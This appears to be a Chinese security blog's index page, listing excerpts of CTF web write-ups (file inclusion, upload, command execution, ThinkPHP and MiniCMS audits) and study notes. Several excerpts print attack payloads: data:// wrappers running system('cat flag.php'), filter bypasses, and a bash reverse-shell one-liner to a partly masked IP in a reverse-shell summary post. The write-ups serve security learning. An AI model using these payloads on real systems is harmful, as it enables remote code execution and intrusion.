2021年01月_bfengj

原创 MiniCMS漏洞审计

前言在之前ctfshow的DJBCTF里的虎山行那题结合着MiniCMS出了题目，当时的自己没有审这么多代码的经验，没有做出来。赛后也仅仅是照着大师傅们的WP沿着出题人自己加的那些漏洞点给复现了一遍，但是对于MiniCMS并没有认认真真的审一遍。因为这个CMS的代码真的比较简单易懂，对于想要开始审计CMS的自己来说是一个非常好的开胃菜，所以就大致把这个CMS的代码看了一遍，复现了一下这个CMS的种种CVE漏洞。引用一下结构：│ build.php│ index.php 整个项目的入口，首先引入核

2021-01-29 21:57:39 961

原创 CTFSHOW 月饼杯 web

web1_此夜圆<?phperror_reporting(0);class a{ public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup()

2021-01-29 13:52:57 544

原创 [强网杯 2019]Upload

前言又是一道反序列化的题目，而且也是thinkphp，一审起来才感觉到自己的代码审计能力就像屎一样，反序列化的链都找偏了。这个寒假不审个几万行代码我tm就去吃屎，草。WP进入环境看到那个favicon就想不会是thinkphp吧，扫了一下目录果然是thinkphp：www.tar.gz可以下载到源代码，对controller审计一下。<?phpnamespace app\web\controller;use think\Controller;class Index extends

2021-01-25 17:57:33 343

原创 DJBCTF2021-WEB-虎山行

前言刚结束的DJBCTF的一道web题，当时看到这么多代码太懒了没去审，其实这题并不难，自己还是太菜了，没去审的另一个原因也是自己太菜了觉得自己审不出来什么，还是需要克服困难去挑战自己啊。而且这个题目也比较有意思，关于那个phar反序列化的知识和一个大师傅讨论后也学习到了超级多的东西，对于phar反序列化的理解也是加深了许多。WP虎山行有2题，本来是1题，但是因为被minicms本身install.php这个鸡肋的RCE给非预期了，所以又出了第二题。不过拿install.php秒第一题是真的爽（笑）。

2021-01-25 14:31:12 460

原创关于php://filter在file_put_contents中的利用

前言今天遇到了一道PHP文件包含的题目：<?php$filename=$_GET['filename'];$content=$_POST['content'];file_put_contents($filename,'<?php exit();'.$content);highlight_file(__FILE__);是一道比较老的题目了，但是里面的知识点和利用的姿势还是非常值得学习的。我花了点时间学习了很多大师傅们的文章，把学习得到的姿势记录下来。当然还有如下的变形：&lt

2021-01-24 21:53:50 1303 1

原创 CTFshow-WEB入门-文件包含(持续更新)

web78?file=data://text/plain,<?php system("cat flag.php");?>或者伪协议读也行。web79?file=data://text/plain,<?= system("cat flag*");?>或者?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==其中data://可以换成data:web80方法一：远程文件

2021-01-23 22:26:04 1497 1

原创 [GYCTF2020]EasyThinking

知识点thinkphp6.0.0-6.0.1的任意文件写入绕过disable_functionsWP很有意思的一道题目，因为自己对于thinkphp实在不了解，也是踩了好多坑才做了出来。首先进入环境进行简单的信息收集，发现存在www.zip，可以下载源码。下载下来发现是thinkphp6，版本是6.0.0。经过搜索，发现该版本存在任意文件写入，和session有关，参考文章如下：ThinkPHP 6.0.1 漏洞分析(任意文件操作)对下载下来的源码简单审一下，重点是这个Member.php

2021-01-21 18:22:44 554

原创 [b01lers2020]Welcome to Earth

知识点抓包看东西WP找到/chase/找到/leftt/找到/shoot/然后是/door/接着就是看/static/js/door.js，找到/open/。看/static/js/open_sesame.js，找到/fight/再看/static/js/fight.js// Run to scramble original flag//console.log(scramble(flag, action));function scramble(flag, key) { for

2021-01-21 16:46:29 372 2

原创 [WUSTCTF2020]CV Maker

知识点很简单的文件上传。WP很简单的文件上传题，比较好的就是有点像真实的渗透，拿到后台，然后上传文件拿shell。这题唯一对我来说不友好的就是纯英文，英文太差的我做这样的题目，感觉浑身不自在。进入环境注册个账号，然后登录进去，发现可以更改头像，相当于文件上传，文件上传也没什么过滤，直接传就可以了。传过后f12看一下传上去的马的位置：拿蚁剑连，然后找flag就可以了。...

2021-01-20 17:13:16 1139 1

原创 CTFshow-WEB入门-文件上传(持续更新)

web151前端检测，抓包改后缀。web152直接传web153php2, php3, php4, php5, phps, pht, phtm, phtml经过测试全都不行。因此环境是nginx不是apache，所以.htaccess也不行。访问一下/upload/目录，发现页面存在，经过测试，/upload/index.php存在，因此想到上传.user.iniweb154经过测试，文件里不能有php，而且对后缀进行了过滤，同样利用.user.ini，文件内容的过滤则利用PHP的短标签

2021-01-20 16:56:04 2284

原创 CTFshow-WEB入门-PHP特性(持续更新)

web89利用intval的这个特性：非空的数组会返回1，因此利用数组绕过。web90两种方式：?num=4476a?num=0x117cweb91考察了preg_match的/m模式。默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”，那么开始和结束将会指字符串的每一行：每一行的开头就是"^"，结尾就是"$"。因此?cmd=php%0a1即可web92<?phpinclude("flag.php");highlight_file(__

2021-01-20 16:23:33 5228

原创 CTFshow-WEB入门-命令执行

web29?c=system("cat fla*.php");或者连蚁剑得flag。web30或者其他姿势，因为过滤太少，命令执行得函数很多，绕过姿势也很多，因此不列举了。web31或者?c=echo`tac%09fl*`;web32利用自己以前没有注意过得一个点。if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){过滤了括号和分号确实有些难受。过滤了括号只能用无括号的

2021-01-20 13:56:09 9378 12

原创 CTFshow-WEB入门-爆破

web21学习到了bp新的爆破姿势，custom iterator的使用抓包发现我们要爆破的内容是这个：Authorization: Basic YWRtaW46MQ==base64解密，发现类似这样 admin:123456因此使用自定义迭代器：对密码进行爆破，此外还要进行base64加密：特别需要注意得是，不要对这些字符url编码：base64加密后可能有=，对=进行url编码的话就会出问题：...

2021-01-20 11:24:38 652

原创 CTFshow-WEB入门-信息收集

web1f12web2ctrl+uweb3bp抓包看响应头web4文件在robots.txt里web5index.phpsweb6www.zip泄露，访问fl000g.txtweb7访问/.git/index.phpweb8.svn泄露，直接访问.svnweb9index.php.swpweb10cookie中web11通过dns检查查询flag https://zijian.aliyun.com/ TXT 记录，一般指为某个主机名或域名设置的说明。TXT记录一

2021-01-19 22:20:51 373

原创大二上小结与寒假展望

前言本来这是大二上最后一周的周记，结果因为各种事情，从6号拖到了现在，再写周记也不合适了，那么就写一下大二上的小结和寒假的展望吧。小结和展望一学期很快就过去了。这学期的规划大概就是时间全花在web上，其他的课也是全靠期末突击几天，事实证明突击的每一门课确实很难取得多高的成绩，不过因为这些基本都是没什么用的课，因此不必放在心上。下学期的课也是相当的多，不过相应的比较硬的课也就有了，因此也不必担心上的课全是没用的课了，也可以好好去学，因此对于下学期还是比较乐观的。web的话，其实这学期也只是学了非常浅的

2021-01-15 22:33:23 344 3

原创 [网鼎杯 2020 白虎组]PicDown

知识点文件读取文件描述符python代码审计反弹shellWP总的来说还是一道比较简单的题目，有毒的地方就是那个url，我卡在那个url上面了，我真的以为这是一个SSRF，没想过去试试直接文件读取，没想到真的这样：?url=../../../../../etc/passwd可以读到东西。虽然我也尝试过用file，但是没读到东西，看来是被过滤了，还是自己的...

2021-01-07 15:03:49 2571 4

原创反弹shell的总结

前言ctf中经常执行命令没有回显，需要进行反弹shell，而不同的环境反弹shell的姿势也不尽相同，所以就在这里总结一下，自己以后遇到了什么新的姿势都会加进来。比较常见的姿势比较常见的基本就是bash反弹,python反弹和curl反弹了。bash反弹shell没啥好说的，因为太常见了：bash -i >& /dev/tcp/118.xxx.xxx.xxx/39009 0>&1curl反弹shell其实有点类似bash反弹，一个例子如下：curl http:

2021-01-07 14:43:45 1186

原创大二上第十八周总结

本周总结我本来这学期不想再继续写周总结了，一方面是希望2021年的第一篇博客可以是一篇相对质量高一点的文章，给我的2021年起一个好头；另一方面则是这学期剩下的2周的生活实在过于枯燥，完完全全在预习大物和数据库罢了。但是还是写了，因为我觉得写划水的周总结都比预习nt大物要快乐的多。这周花了三天时间稍微看了一下数据库，我本就想到了会出大量的概念题，所以我压根就没背，光看了SQL编程，果然试卷上这么多的概率题属实让人ex，幸好我全都不会hhhhhh。考完数据库就是31号了，也是跨年了。2020年也算是结束

2021-01-04 10:25:42 222 1

feng的博客